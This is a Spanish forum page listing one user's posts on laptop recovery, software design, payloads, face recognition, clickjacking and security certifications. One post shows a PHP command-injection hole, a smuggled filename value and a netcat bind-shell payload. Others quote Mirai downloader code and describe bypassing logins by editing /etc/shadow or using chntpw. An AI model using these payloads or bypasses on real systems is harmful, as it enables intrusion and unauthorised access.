Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - animanegra

#41
Windows / Re: Laptop vieja
5 Agosto 2019, 12:33 PM
Siempre que no este cifrado.

Si deseas recuperar datos. Puedes arrancar desde un sistema live o bien le sacas el disco duro y lo conectas a otro ordenador como esclavo para sacar el contenido a otro disco duro. Después formateo y reinstalación y ya.

Si quieres poder hacer login en ella, desde otro sistema cámbiale las contraseñas y ya está. Por ejemplo si es un linux borras los hashes del "/etc/shadow" y así haces login sin password. Si es un windows haces lo equivalente pero con el archivo de passwords de ese sistema. En el caso de windows habia una herramienta live que automatizaba el cambio de passwords de forma muy sencilla, no recuerdo el nombre. Desde linux creo que hay una utilidad llamada chntpw que permite hacerlo.

Si el disco duro está cifrado, a intentar acordarte de la password.

PD: He dado por hecho que no se referia a la password de la BIOS.
#42
Todo lo que va en la dirección de que no entiendas que esta pasando en la ejecución es un problema. Se hacen ahora modelos de 20000 capas en los que ni el programador sabe que esta pasando realmente, ni como se están comunicando y ni siquiera se comprende el flujo de datos pero sale software como churros. Eso si es un problema y gordo. Después en cada una de esas intersecciones se puede meter la palanca y vienen los lloros.

El hacer las cosas entendiendo lo que se hace obliga normalmente a que la producción de software se vuelva más costosa, y eso en la actual producción empresarial no se entiende porque se consigue vender mucha basura y se aprietan los costos a más no poder. Pero no quiere decir que este bien hecho. Cada día resulta que vienen noticias de mil sistemas que se tumban y mil filtraciones debido a que se pone gente a producir mediante tecnologías que no llegan a entender y venden productos que ni saben que tienen fallos.

Si utilizas una tecnología mas te vale comprenderla y si no, no deberías utilizarla ya que supone no saber que se está haciendo. El modelo de funcional estará sensacional, pero veras que risas cuando el sistema de tu banco tenga un sistema funcional magnífico con muchas mierdas móviles muy bonitas pero que no entienda ni el tato como fluyen los datos por él. Al final como nadie se responsabiliza, es siempre el usuario el que sale perjudicado.

Resumiendo, mi punto de vista es que se deben utilizar las tecnologías que quieras, el número de capas que desees y los elementos que necesites. Pero que se tiene que entender bien que está pasando en tu sistema, si no va a ser un problema.
#43
Cita de: kripton en 17 Julio 2019, 22:02 PM
bueno para crear payloads para windows o android  pero de forma de que no emplee el uso de metasploit framework

Un payload es la ejecución de cualquier cosa. Puedes desde querer ejecutar la calculadora hasta ejecutar un sistema de control remoto.

Dependiendo de en donde ,exploit, vas a ejecutar dicho exploit tienes determinadas restricciones. El payload puede ser en algunos casos ejecución de determinados comandos, o una funcion compilada en binario para ejecutar en un buffer.

Por ejemplo, en un php que tenga en algun parte del código algo como esto:


system("convert ".$GET['nombrefichero']." ".random().".jpg");


Se podría meter en la variable GET nombre de fichero el valor:


"abc abc.jpg; PAYLOAD; convert abc "


onde PAYLOAD puede ser cualquier comando, en un entorno linux con nc por ejemplo si payload vale esto:


mkfifo /tmp/dummy; nc -l -p 4000 < /tmp/dummy | /bin/bash > /tmp/dummy;


consigues una ejecucion de un entorno de comandos remoto en el servidor cuando te conectas al puerto 4000.

Pero por ejemplo ese payload concreto no se puede utilizar en un entonrno con un servidor con buffer overflow que permite ejecucion de comandos en pila, poque necesitas la generación de un payload que esté codificado en binario en forma de funcion para que cuando cambies la direccion de salto, saltes al payload y se ejecute la funcion que deseas. Que podría ser perfectamente un execvp de lo que he descrito arriba, pero necesitas envolverlo de más cosas para que séa funcional.

¿Se entiende? Por lo que ¿A que te refieres con hacer tu propio Payload? Porque los payloads al finál se pueden codificar en bash, visualbasic, python, SQL, codigo ensamblador.... dependiendo a que exploit van asociados.
#44
En lo que respecta al dlr en su main tienes esto:


#define HTTP_SERVER utils_inet_addr(127,0,0,1) // CHANGE TO YOUR HTTP SERVER IP


Esto se conecta al servidor http que tu pongas como pone en esa linea.
y hace peticiones GET a dicho server:


if (write(sfd, "GET /bins/mirai." BOT_ARCH " HTTP/1.0\r\n\r\n", 16 + arch_strlen + 13) != (16 + arch_strlen + 13))


Y se baja el contenido guardandolo en un archivo.
#45
Para que exploit, sistema y arquitectura? Es un re en un sistema web con PHP??
#46
Plantéas varios problemas que no se si están del todo pensados, voy con una posible solución sencilla a la parte del reconocimiento facial. Probabablemente el algoritmo de reconocimiento facial más sencillo es el basado en matrices de máximos y minimos. Lo que tienes que hacer es hacerte un array con los pixeles de cada persona que deseas reconocer. Tomas un set de fotos y hallas los máximos de cada pixel y los minimos de cada pixel. Te quedarán dos imágenes de dos caras un tanto raras pero que describe el máximo y el minimo del set de fotos del que dispones de cada cara.
Despues para reconocer, simplemente lo que tienes que hacer es hallar el error de cada pixel de la foto nueva que has tomado respecto al máximo y el minimo. Si pixmaximo y pixminimo es el valor de un pixel de la foto cuando miras el valor de dicho pixel pix en la foto nueva el error será la distancia pix-pixmaximo en caso de que pix > pixmaximo y pixminimo-pix en caso de que pix < pixminimo. En otro caso el error será 0.
Sumas el error que te devuelve de la comparación de cada pixel y ese es el error de tu nueva cara respecto a las que tenías. El método más sencillo distingue entre caras de un set específico, tienes nu numero de caras especifico y hallas el error para todas, la cara nueva será la que tenga error mínimo. Puedes hacer un método más general haciendo un umbral el cual si se sobrepasa no es ninguna cara de tu set.

caras de ejemplo para proceso para que puedas hacer pruebas:
www.cl.cam.ac.uk/Research/DTG/attarchive/pub/data/att_faces.zip

PD: si no se entiende algo o quieres que lo amplíe me dices.
#47
Hacking / Re: Ayuda Pentiesting pagina web
5 Julio 2019, 12:02 PM
Cuando no se da un valor a eso, hace que no se avise al navegador de cuando una web puede o no hacer una carga de su contenido mediante un iframe (u otro tag que haga una carga de la página en otra web).
Una configuración así permitiría que desde otra web cargues contenido de la pagina original y hacer que un cliente sin querer ni  saberlo cargue cosas de dicha web. Permitiendo dependiendo como se juegue con ello ataques de ingenieria social que hagan que el usuario rellene datos que no debiese o haga click en sitios de la página original, etc...
#49
Redes / Re: Software para administrar IP's
21 Junio 2019, 09:01 AM
Creo que se refiere a que de cada dirección IP llevan un registro de quien la tiene asignada y de los demás datos. Entiendo que para que si alguien deja su puesto y viene otro tengan los datos de las IPs que se quedan libres, quien la tenia en que fechas y quien toma el mando desde que fecha.
O algo así intuyo, aunque una mejor explicación tampoco estaría mal como dices :D.
No obstante buscando en duckduckgo "software administracion ips lan" sale esto:
https://www.gestioip.net/ Que parece que es codigo abierto y parece que es algo similar a lo que describe el amigo, o a lo que se intuye que desea.
#50
CitarPor que todo el mundo hace hincapié en la universidad?

Porque si tienes la posibilidad, no te cierres puertas tu sólo. Las carreras posíblemente son la puerta más sencilla a que te cojan en un curro medianamente remunerado con posibilidad de ascender sin un techo.

Evidentemente, si sólo tienes el título de la carrera (sólo el cartón sin los conocimientos) irás a la calle, pero si has aprovechado la carrera y has aprendido durante ella te ofrecerá muchas posibilidades. Determinadas carreras relacionadas con informática y matemáticas tienen periodos máximos de paro de 3 meses con colocación en este momento del 100% en puestos buenos y bien remunerados.

Eso si, si terminas haciendola tómatela en serio. Si ves que terminas arrastrándote por el 5.0 después de varias convocatorias teniendo como único objetivo el aprobar el examen y no aprender (y esto pasa en todas las asignaturas), igual mejor dejarla y ponerte a currar. Posiblemente eso sea un indicativo de que la carrera no es lo tuyo (No hablo de falta de capacidad intelectual, pero a veces determinados métodos de aprendizaje no son buenos para todo el mundo o simplemente no tenemos el interés que pensábamos en la temática de dicha carrera.).

Te recomiendo echar un vistazo al discurso de la servilleta y la entrada sobre la entrevista de trabajo de Chema Alonso, esta muy bien y refleja determinados problemas inherentes a personas que hacen la carrera por inercia.

http://www.elladodelmal.com/2014/05/suspende-como-un-ingeniero-o-atente-las.html

CitarSobre el tema de seguridad: No he mirado mucho, pero esta certificación me llama la atención. https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/

Es una certificación muy bonita, si le das tiempo aprenderás los conceptos básicos de seguridad y terminarán haciendo un examen que consta de atacar 4 máquinas y ownearlas. Siempre hay un buffer overflow. El laboratorio esta guai, un lab con montón de máquinas para atacar y ser owneadas y así aprender "haciendo". Tienes por ahí el pdf del libro que se utiliza durante el curso, igual puedes ojearlo antes de apuntarte.

Si quieres probar un lab del tipo de OSCP puedes empezar probando el de "hack the box", está bastante bien, es gratis (si no quieres tener que compartir máquinas a atacar con oleadas de orcos sedientas de flags tendrás que pagar) y tienes montón de retos para aprender de las distintas disciplinas del hacking poco a poco. Es una forma de ver si te enrolla el tema de la seguridad o no.